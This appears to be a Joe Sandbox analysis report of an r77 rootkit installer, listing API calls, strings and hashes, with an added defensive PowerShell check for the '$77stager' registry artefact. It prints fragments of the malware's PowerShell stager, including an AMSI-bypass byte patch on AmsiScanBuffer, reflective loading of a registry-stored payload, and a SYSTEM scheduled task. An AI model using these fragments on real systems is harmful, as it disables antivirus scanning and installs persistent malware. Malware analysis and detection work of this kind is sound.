                                                                                                                                  • OldProtect, xrefs: 007C1974
                                                                                                                                  • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 007C189D
                                                                                                                                  • AmsiPtr, xrefs: 007C195C
                                                                                                                                  • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invo, xrefs: 007C18C5
                                                                                                                                  • Kernel32Ptr, xrefs: 007C1938
                                                                                                                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 007C18AE
                                                                                                                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 007C18B5
                                                                                                                                  • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 007C18BD
                                                                                                                                  • ,"|, xrefs: 007C187F
                                                                                                                                  • VirtualProtectPtr, xrefs: 007C1950
                                                                                                                                  • Get-Delegate, xrefs: 007C18D8
                                                                                                                                  • ParameterTypes, xrefs: 007C18E4
                                                                                                                                  • AmsiScanBufferPtr, xrefs: 007C1968
                                                                                                                                  • VirtualProtectDelegate, xrefs: 007C192C
                                                                                                                                  • TypeBuilder, xrefs: 007C18FC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Heap$AllocCurrentWow64
                                                                                                                                  • String ID: ,"|$AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invo$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                                                                                  • API String ID: 2666690646-1378993767
                                                                                                                                  • Opcode ID: f400b2c14ee1839192f74ce9737d1b7028b1cf47be0c4106c7c585d957a6d645
                                                                                                                                  • Instruction ID: 2295026c5b93c93544d88b8ad41139771282751919152315a442010b25c3c73b
                                                                                                                                  • Opcode Fuzzy Hash: f400b2c14ee1839192f74ce9737d1b7028b1cf47be0c4106c7c585d957a6d645
                                                                                                                                  • Instruction Fuzzy Hash: D421D0D03429A4A3590632201D6AF6E97469BC2B51790C03DF4455EB8BDE3D9F0343DA

                                                                                                                                  Control-flow Graph (image not reproduced): basic blocks 7c151a-7c1673; the API calls made in each block are listed under APIs below
                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32($77svc64), ref: 007C152C
                                                                                                                                  • SysAllocString.OLEAUT32(007C218C), ref: 007C1538
                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 007C153F
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C1559
                                                                                                                                  • CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C1582
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C1594
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C1609
                                                                                                                                  • CoUninitialize.COMBASE ref: 007C1659
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 007C1666
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C166B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                                                                                  • String ID: $77svc32$$77svc64
                                                                                                                                  • API String ID: 2407135876-98264542
                                                                                                                                  • Opcode ID: 7b159f20ca1045c38b1289aaff2526a31ba2aa0064e764430bd9b9ca99151024
                                                                                                                                  • Instruction ID: 88dca11e24104d192f1ae8e9018d749c0b4a373a1cbdc47e8dabc0241a6220fc
                                                                                                                                  • Opcode Fuzzy Hash: 7b159f20ca1045c38b1289aaff2526a31ba2aa0064e764430bd9b9ca99151024
                                                                                                                                  • Instruction Fuzzy Hash: 8D412D71A00509AFDB01EFA4CC84EAFBBBDEF49314B54406DF905EB251CA75AD46CBA0

                                                                                                                                  Control-flow Graph (image not reproduced): basic blocks 7c17a5-7c1867, including calls to subfunctions 7c1868, 7c1674, 7c112f, 7c11ad and 7c151a; the API calls made in each block are listed under APIs below
                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 007C17B5
                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,007C179D), ref: 007C17C8
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,007C179D), ref: 007C17DA
                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,007C179D), ref: 007C17E5
                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,007C179D), ref: 007C1801
                                                                                                                                  • RegSetValueExW.KERNELBASE(?,$77stager,00000000,00000003,00000000,00000000,?,?,?,?,?,007C179D), ref: 007C1818
                                                                                                                                    • Part of subcall function 007C1868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,007C1827,?,?,?,?,?,007C179D), ref: 007C1872
                                                                                                                                    • Part of subcall function 007C1868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,007C179D), ref: 007C1879
                                                                                                                                    • Part of subcall function 007C1868: StrCpyW.SHLWAPI(00000000,007C222C), ref: 007C1888
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 007C18A3
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 007C18BB
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 007C18C3
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$77stager`)).EntryPoint.Invo), ref: 007C18CB
                                                                                                                                    • Part of subcall function 007C1868: StrCatW.SHLWAPI(00000000,007C222C), ref: 007C18CF
                                                                                                                                    • Part of subcall function 007C1674: SysAllocString.OLEAUT32($77svc32), ref: 007C1686
                                                                                                                                    • Part of subcall function 007C1674: SysAllocString.OLEAUT32(007C218C), ref: 007C1690
                                                                                                                                    • Part of subcall function 007C1674: CoInitializeEx.COMBASE(00000000,00000000), ref: 007C1699
                                                                                                                                    • Part of subcall function 007C1674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C16B3
                                                                                                                                    • Part of subcall function 007C1674: CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C16DC
                                                                                                                                    • Part of subcall function 007C1674: VariantInit.OLEAUT32(?), ref: 007C16EE
                                                                                                                                    • Part of subcall function 007C1674: CoUninitialize.COMBASE ref: 007C177A
                                                                                                                                    • Part of subcall function 007C1674: SysFreeString.OLEAUT32(?), ref: 007C178C
                                                                                                                                    • Part of subcall function 007C1674: SysFreeString.OLEAUT32(00000000), ref: 007C178F
                                                                                                                                    • Part of subcall function 007C112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,007C18AA,?,?,?,?,?,007C179D), ref: 007C113D
                                                                                                                                    • Part of subcall function 007C112F: IsWow64Process.KERNEL32(00000000,?,?,007C18AA,?,?,?,?,?,007C179D), ref: 007C1144
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32($77svc64), ref: 007C11C2
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(007C2228), ref: 007C11CC
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(powershell), ref: 007C11D8
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(?), ref: 007C11E0
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(007C218C), ref: 007C11EA
                                                                                                                                    • Part of subcall function 007C11AD: SysAllocString.OLEAUT32(SYSTEM), ref: 007C11F4
                                                                                                                                    • Part of subcall function 007C11AD: CoInitializeEx.COMBASE(00000000,00000000), ref: 007C11FB
                                                                                                                                    • Part of subcall function 007C11AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C1215
                                                                                                                                    • Part of subcall function 007C11AD: CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C123E
                                                                                                                                    • Part of subcall function 007C11AD: VariantInit.OLEAUT32(?), ref: 007C1250
                                                                                                                                    • Part of subcall function 007C151A: SysAllocString.OLEAUT32($77svc64), ref: 007C152C
                                                                                                                                    • Part of subcall function 007C151A: SysAllocString.OLEAUT32(007C218C), ref: 007C1538
                                                                                                                                    • Part of subcall function 007C151A: CoInitializeEx.OLE32(00000000,00000000), ref: 007C153F
                                                                                                                                    • Part of subcall function 007C151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C1559
                                                                                                                                    • Part of subcall function 007C151A: CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C1582
                                                                                                                                    • Part of subcall function 007C151A: VariantInit.OLEAUT32(?), ref: 007C1594
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                                                                                                                                  • String ID: $77stager$$77svc32$$77svc64$@Vu$EXE$SOFTWARE
                                                                                                                                  • API String ID: 2402434814-542727658
                                                                                                                                  • Opcode ID: 0c7e7f63e618ba7e221d513c100780003a42012fd2541b9891f9f79d89dc7ad3
                                                                                                                                  • Instruction ID: 63fe2ccdcd1dfa6f181f61ae517dffd13dc86046229562dd8e364fac8934f912
                                                                                                                                  • Opcode Fuzzy Hash: 0c7e7f63e618ba7e221d513c100780003a42012fd2541b9891f9f79d89dc7ad3
                                                                                                                                  • Instruction Fuzzy Hash: 01118261704719BBAB1127725C8EF7B2B9DEB837A0B48003DB905E2153EE2CCC42C6B4

                                                                                                                                  Control-flow Graph (image not reproduced): basic blocks 7c1000-7c104a; the API calls made in each block are listed under APIs below
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextW.ADVAPI32(007C1A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,007C1A2F), ref: 007C101E
                                                                                                                                  • CryptGenRandom.ADVAPI32(007C1A2F,00004000,00000000,?,007C1A2F), ref: 007C102D
                                                                                                                                  • CryptReleaseContext.ADVAPI32(007C1A2F,00000000,?,007C1A2F), ref: 007C1039
                                                                                                                                  Strings
                                                                                                                                  • Microsoft Base Cryptographic Provider v1.0, xrefs: 007C100E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                   • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                   • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                                                                                  • API String ID: 1815803762-291530887
                                                                                                                                  • Opcode ID: 7fd46311f205c262b9c7bbba6274ada5e695ec703c5a4c0878795247584b4dc4
                                                                                                                                  • Instruction ID: dc4f6d6391a3a9ca6ba7dd75e10d57450cb527ee9e555b7aebf75a146979cda8
                                                                                                                                  • Opcode Fuzzy Hash: 7fd46311f205c262b9c7bbba6274ada5e695ec703c5a4c0878795247584b4dc4
                                                                                                                                  • Instruction Fuzzy Hash: 35E02B727001247FEB304B959C89FCB3B6CEB40754F10403EB504E3110D9A4CD80D274

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00008000,754A2EB0,00000000,007C222C), ref: 007C19F4
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 007C1A01
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00004000), ref: 007C1A15
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 007C1A1C
                                                                                                                                    • Part of subcall function 007C1000: CryptAcquireContextW.ADVAPI32(007C1A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,007C1A2F), ref: 007C101E
                                                                                                                                    • Part of subcall function 007C1000: CryptGenRandom.ADVAPI32(007C1A2F,00004000,00000000,?,007C1A2F), ref: 007C102D
                                                                                                                                    • Part of subcall function 007C1000: CryptReleaseContext.ADVAPI32(007C1A2F,00000000,?,007C1A2F), ref: 007C1039
                                                                                                                                  • StrStrIW.KERNELBASE(?,007C37E4), ref: 007C1A46
                                                                                                                                  • StrStrIW.SHLWAPI(00000002,007C37E4), ref: 007C1A6D
                                                                                                                                  • StrNCatW.SHLWAPI(00000000,?,?), ref: 007C1A84
                                                                                                                                  • StrCatW.SHLWAPI(00000000,007C37E8), ref: 007C1A90
                                                                                                                                  • StrCatW.SHLWAPI(?,'+[Char](), ref: 007C1AE8
                                                                                                                                  • StrCatW.SHLWAPI(?,?), ref: 007C1AF2
                                                                                                                                  • StrCatW.SHLWAPI(?,'+'), ref: 007C1B1C
                                                                                                                                  • StrCatW.SHLWAPI(00000000,?), ref: 007C1B2C
                                                                                                                                  • StrCatW.SHLWAPI(00000000,007C37E8), ref: 007C1B47
                                                                                                                                  • StrStrIW.SHLWAPI(?,007C37E4), ref: 007C1B61
                                                                                                                                  • StrCatW.SHLWAPI(00000000,?), ref: 007C1B75
                                                                                                                                  • StrCpyW.SHLWAPI(?,00000000), ref: 007C1B7C
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C1B8A
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 007C1B93
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007C1B99
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000), ref: 007C1B9C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                   • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                   • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                                                                                                  • String ID: '+'$'+[Char]($)+'
                                                                                                                                  • API String ID: 3510167801-3465596256
                                                                                                                                  • Opcode ID: e9055affbebe9d8fe56e88e681ffbd3336cc90007934f6c7421f9c8e3f808acd
                                                                                                                                  • Instruction ID: 20e43d23cf1a454459160a0d9f544b61f4d1e0731194a85835b51f34602aba82
                                                                                                                                  • Opcode Fuzzy Hash: e9055affbebe9d8fe56e88e681ffbd3336cc90007934f6c7421f9c8e3f808acd
                                                                                                                                  • Instruction Fuzzy Hash: B95131B1E0021CABCB14DFE8DC89EAEBBB9FB49700F14456EE505E3241DA79DA41CB54

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32($77svc64), ref: 007C11C2
                                                                                                                                  • SysAllocString.OLEAUT32(007C2228), ref: 007C11CC
                                                                                                                                  • SysAllocString.OLEAUT32(powershell), ref: 007C11D8
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 007C11E0
                                                                                                                                  • SysAllocString.OLEAUT32(007C218C), ref: 007C11EA
                                                                                                                                  • SysAllocString.OLEAUT32(SYSTEM), ref: 007C11F4
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 007C11FB
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C1215
                                                                                                                                  • CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C123E
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C1250
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C13EA
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C13F0
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C1400
                                                                                                                                  • CoUninitialize.COMBASE ref: 007C14E8
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C14FA
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 007C14FD
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C1502
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C1507
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C150C
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C1511
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                   • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                   • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                  • String ID: $77svc32$$77svc64$SYSTEM$powershell
                                                                                                                                  • API String ID: 3960698109-842754474
                                                                                                                                  • Opcode ID: dc52f714022369376d0a809ae66fbf5e102d3e96ef2adb8630216f14e061e5d8
                                                                                                                                  • Instruction ID: 8530ef97b94d0fc788d6c691f085c31d73c6172eee9d16240db4da1046d19d47
                                                                                                                                  • Opcode Fuzzy Hash: dc52f714022369376d0a809ae66fbf5e102d3e96ef2adb8630216f14e061e5d8
                                                                                                                                  • Instruction Fuzzy Hash: 13C10A71E00119EFDB04DFA4C984EAEBBB9FF49314B5040ADE905EB211DB75AE06DB50

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32($77svc32), ref: 007C1686
                                                                                                                                  • SysAllocString.OLEAUT32(007C218C), ref: 007C1690
                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 007C1699
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 007C16B3
                                                                                                                                  • CoCreateInstance.OLE32(007C20A8,00000000,00000001,007C2088,?), ref: 007C16DC
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007C16EE
                                                                                                                                  • CoUninitialize.COMBASE ref: 007C177A
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 007C178C
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 007C178F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                   • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                   • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                  • String ID: $77svc32
                                                                                                                                  • API String ID: 4184240511-3937287066
                                                                                                                                  • Opcode ID: 35063656e201179760d68997222dfeba3bfa683d130c585ebef2fdc76e44e7dc
                                                                                                                                  • Instruction ID: a2bab2d83826e2856dcb05a6db82fc26a8ace6676f86afe339b9f65bfbad1858
                                                                                                                                  • Opcode Fuzzy Hash: 35063656e201179760d68997222dfeba3bfa683d130c585ebef2fdc76e44e7dc
                                                                                                                                  • Instruction Fuzzy Hash: 9F316071A00518AFDB00DFA8CC84EAFBB7DEF4A754B10406DF905EB251CA75AD46CBA0

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(Get-Delegate,00000000,007C222C), ref: 007C1999
                                                                                                                                  • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 007C19B5
                                                                                                                                  • StrStrIW.SHLWAPI(?,Get-Delegate,754A2EB0), ref: 007C19D2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                   • Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                   • Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen
                                                                                                                                  • String ID: Get-Delegate
                                                                                                                                  • API String ID: 1659193697-1365458365
                                                                                                                                  • Opcode ID: b258952ae0bbe939cc915a30f239a95be94f122556776f60efe6d11e227a74aa
                                                                                                                                  • Instruction ID: f0b3157e61dff86873902e67ca09a739932a718931fee6a61ab68c353ce7931f
                                                                                                                                  • Opcode Fuzzy Hash: b258952ae0bbe939cc915a30f239a95be94f122556776f60efe6d11e227a74aa
                                                                                                                                  • Instruction Fuzzy Hash: CEF05B31700218ABDB149B659D44F9EB7FCAF45344F04407FE905F3151EA749D41C664

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 007C17A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 007C17B5
                                                                                                                                    • Part of subcall function 007C17A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,007C179D), ref: 007C17C8
                                                                                                                                    • Part of subcall function 007C17A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,007C179D), ref: 007C17DA
                                                                                                                                    • Part of subcall function 007C17A5: LockResource.KERNEL32(00000000,?,?,?,?,?,007C179D), ref: 007C17E5
                                                                                                                                    • Part of subcall function 007C17A5: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,007C179D), ref: 007C1801
                                                                                                                                    • Part of subcall function 007C17A5: RegSetValueExW.KERNELBASE(?,$77stager,00000000,00000003,00000000,00000000,?,?,?,?,?,007C179D), ref: 007C1818
                                                                                                                                  • ExitProcess.KERNEL32 ref: 007C179E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.1406869864.00000000007C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000002.00000002.1406838239.00000000007C0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_7c0000_Install.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3836967525-0
                                                                                                                                  • Opcode ID: fe0f7579d6cd2895b4a2b026b955202619b4311eb1ee058bf3e851ca6d0a1294
                                                                                                                                  • Instruction ID: 07fa38cf365c9b7bd95d29a32d43187cd8bd2777d78e02892150d688b4e76303
                                                                                                                                  • Opcode Fuzzy Hash: fe0f7579d6cd2895b4a2b026b955202619b4311eb1ee058bf3e851ca6d0a1294
                                                                                                                                  • Instruction Fuzzy Hash:
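What the subcall at 007C17A5 does, read off the API list above: FindResourceA with hModule NULL, resource id 0x65 (101) and type "EXE", then SizeofResource / LoadResource / LockResource to get the embedded payload bytes; RegOpenKeyExW on HKEY_LOCAL_MACHINE (0x80000002) \ SOFTWARE with KEY_ALL_ACCESS (0x000F013F); RegSetValueExW writing a value named "$77stager" with type 3 (REG_BINARY); and the caller at 007C179E then calls ExitProcess. The security-relevant point is the persistence artefact: a binary registry value with the r77 "$77" prefix directly under HKLM\SOFTWARE. The PowerShell check below is an added example for hunting that artefact; it is not part of the Joe Sandbox report or of the analysed sample. It assumes only the "$77" name prefix seen here, and the hypothetical `$subkey` variable exists so the same check can be pointed at a hive loaded offline. Caveat for the practitioner: this family hides "$77"-prefixed names from processes it has injected (the execution graph in this report contains a function wrapping NtEnumerateValueKey whose results are compared with StrCmpNIW), so run the check from a process the rootkit has not injected, or against the SOFTWARE hive of the machine loaded offline from a clean boot or a forensic image.

```powershell
# Added example (not from the Joe Sandbox report or the sample): look for the
# r77-style "$77"-prefixed REG_BINARY value that the stager at 007C17A5 writes
# under HKLM\SOFTWARE. Only the "$77" name prefix is assumed as an indicator.
#
# Offline variant (assumption: hive copied out of a clean boot or image):
#   reg load HKLM\OfflineSW X:\mount\Windows\System32\config\SOFTWARE
#   then set $subkey = 'OfflineSW' before running, and 'reg unload' afterwards.
$subkey = 'SOFTWARE'

$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($subkey)
if (-not $key) { throw "cannot open HKLM\$subkey" }

$hits = foreach ($name in $key.GetValueNames()) {
    # single quotes: no interpolation, the literal name prefix is "$77"
    if ($name -like '$77*') {
        $data = $key.GetValue($name)
        [pscustomobject]@{
            Path = "HKLM\$subkey"
            Name = $name
            Kind = $key.GetValueKind($name)   # expect Binary (REG_BINARY, type 3)
            Size = if ($data -is [byte[]]) { $data.Length } else { $null }
            # a REG_BINARY value holding a PE image starts with the "MZ" magic
            IsPE = ($data -is [byte[]]) -and $data.Length -gt 1 -and
                   $data[0] -eq 0x4D -and $data[1] -eq 0x5A
        }
    }
}
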